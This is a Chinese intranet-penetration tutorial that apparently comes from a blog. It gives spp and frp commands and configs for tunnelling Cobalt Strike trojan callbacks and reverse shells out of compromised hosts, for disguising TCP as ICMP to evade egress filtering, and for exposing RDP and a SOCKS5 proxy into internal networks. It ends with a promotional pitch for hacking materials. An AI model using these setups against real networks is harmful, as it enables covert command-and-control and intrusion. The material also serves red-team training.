内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透
内网穿透:解决网络控制上线&网络通讯问题
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
spp隧道代理工具
支持的协议:
TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic
支持类型:
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合
spp工作原理图
spp详解以及下载地址:
https://github.com/esrrhs/spp/tree/0.6
cs上线主机
spp代理通信
本工具使用简单,服务器、客户机各一条命令,就可建立连接。
服务端配置
chmod +x spp ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp,并设置为服务端,通信协议为tcp,监控本地的8888端口。
客户端配置
chmod +x spp ##添加执行权限
./spp -name "sx" -type reverse_proxy_client -server 服务器ip地址:8888 -fromaddr :7777 -toaddr :6666 -proxyproto tcp ## 设置一个名字(自定义即可),连接服务器的IP地址及端口,将服务器的端口7777映射到本地的端口6666上,设置通信协议为tcp。
服务端可进行查看连接状态
CS配置
CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。
设置CS生成木马的监听器
此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。
配置CS监听上线的监听器
接受上线主机的监听器(shell)。
生成木马
将木马上传到目标主机当中,执行即可。
成功上线
spp服务端代理状态:
spp隧道搭建
若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。
服务端配置
这里设置监听的是icmp协议。
./spp -type server -proto ricmp -listen 0.0.0.0 ##这里设置监听ICMP协议,全端口
客户端配置
客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。
spp -name "sx" -type proxy_client -server 服务器IP -fromaddr :7777 -toaddr :6666 -proxyproto tcp -proto ricmp
服务端状态,成功建立隧道
CS配置
CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。
这生成本地的7777端口,因为客户端上已经设置了将7777端口转发了。
生成另一个监听器,监听本地的IP地址的6666端口即可。
监听器状态:
生成木马,执行上线。
选择本地监听器,生成木马即可。
将木马上传到目标机器,执行木马
执行木马,成功上线
spp客户端状态。并抓取流量分析,为icmp流量,伪装成功。
ICMP流量
spp隧道代理工具还可以伪装其他协议,具体详解见spp代理
frp内网穿透
frp 是一种快速反向代理,允许您将位于 NAT 或防火墙后面的本地服务器公开给Internet。它目前支持 TCP和 UDP,以及 HTTP和 HTTPS协议,支持通过域名将请求转发到内部服务。frp 还提供 P2P 连接模式。
项目地址:fatedier/frp
对应下载即可
内网穿透上线
frp配置
服务端配置,修改frps.ini配置文件,简单配置
客户端配置
[common]
server_addr = 服务器ip
server_port = 8080 #连接端口
[nwct]
type = tcp
local_ip = 127.0.0.1
local_port = 9999
remote_port = 8888
服务端开启。客户端开启。观察状态,成功建立连接。
客户端开启,向服务器建立连接。
服务端状态,成功建立连接。
CS上线
客户端开启CS,配置监听器。需要两个监听器,一个生成木马,一个监听反弹shell。
生成木马的监听器配置:
接受shell的监听器配置:
生成木马,上传到目标机器当中,执行,成功上线
上传到目标机,并执行木马
成功上线
配置RDP远程桌面连接内网主机
服务端简单配置不变,开启frp服务
客户端在目标机上执行,配置文件修改
[common]
server_addr = 服务器ip
server_port = 8080
[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 5555
开启客户端服务,服务端查看状态,成功建立连接
服务端状态
远程桌面连接:
成功连接
socks5代理转发
通过代理转发,实现访问内网web服务
客户端配置:
[socks5]
type = tcp
remote_port = 8081
plugin = socks5
客户端执行即可
服务端状态:
通过代理软件或浏览器代理插件配置代理,可访问内网服务
访问内网web服务
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取